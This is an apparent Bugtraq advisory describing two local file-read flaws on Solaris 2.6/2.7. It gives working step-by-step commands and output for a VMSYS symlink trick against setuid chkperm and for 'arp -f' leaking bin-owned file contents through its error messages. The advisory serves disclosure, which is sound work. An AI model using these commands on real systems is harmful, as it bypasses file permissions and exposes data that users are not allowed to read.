Greetings, OVERVIEW /usr/vmsys/bin/chkperm and /usr/sbin/arp can be used to read bin-owned files. BACKGROUND All my testing was done on Solaris 2.7 and 2.6 SPARC edition. DETAILS Vuln #1 - chkperm This one isn't nearly as interesting as the instant-shell variety. Here's how it works: chkperm is suid/sgid bin as shown: bash-2.02$ ls -la /usr/vmsys/bin/chkperm -rwsr-sr-x 1 bin bin 10080 Sep 1 1998 /usr/vmsys/bin/chkperm /etc/bin is a bin/bin owned file mode 660 (thus shouldn't be readable by me) as shown: bash-2.02$ ls -la /etc/bin -rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin the exploit goes as follows: bash-2.02$ export VMSYS=/usr/home/btellier bash-2.02$ mkdir lib bash-2.02$ chmod 777 lib bash-2.02$ ln -s /etc/bin lib/.facerc bash-2.02$ /usr/vmsys/bin/chkperm -l seekret1 seekret2 seekret3 seekret4 seekr bash-2.02$ As we can see, it cuts off the last line of five total for some reason. The meat of this exploit is the fact that chkperm allows you to supply the directory it will write known file names with VMSYS, a big no-no. I've not been able to get chkperm to either a. change the permissions of an existing bin-owned file or b. create a bin-owned file other than .facerc, though this can be created anywhere on the filesystem via export VMSYS=/etc or some such command. This exploit is sort-of a variation on the old chkperm exploit which allowed .facerc to be linked to /usr/bin/.rhosts. That particular problem was fixed, but this one was left behind. Vuln #2 - arp Just as the first, you may read any bin owned files: bash-2.02$ ls -la /etc/bin -rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin bash-2.02$ cat /etc/bin cat: cannot open /etc/bin bash-2.02$ /usr/sbin/arp -f /etc/bin arp: bad line: seekret1 arp: bad line: seekret2 arp: bad line: seekret3 arp: bad line: seekret4 arp: bad line: seekret5 bash-2.02$ DISCUSSION Now I, just as you probably are, am wondering how this slight bug might be upgraded or combined to become more severe. I can't think of any situation where we have bin-owned files unreadable that contain sensitive information (considering that we can't overwrite the files, or execute them or change the modes, all we can do is read plaintext). Maybe one of the bugtraq readers has some old exploit lying around that required the reading of a bin owned file in order to work. Or something. Brock Tellier UNIX Systems Administrator btellier@usa.net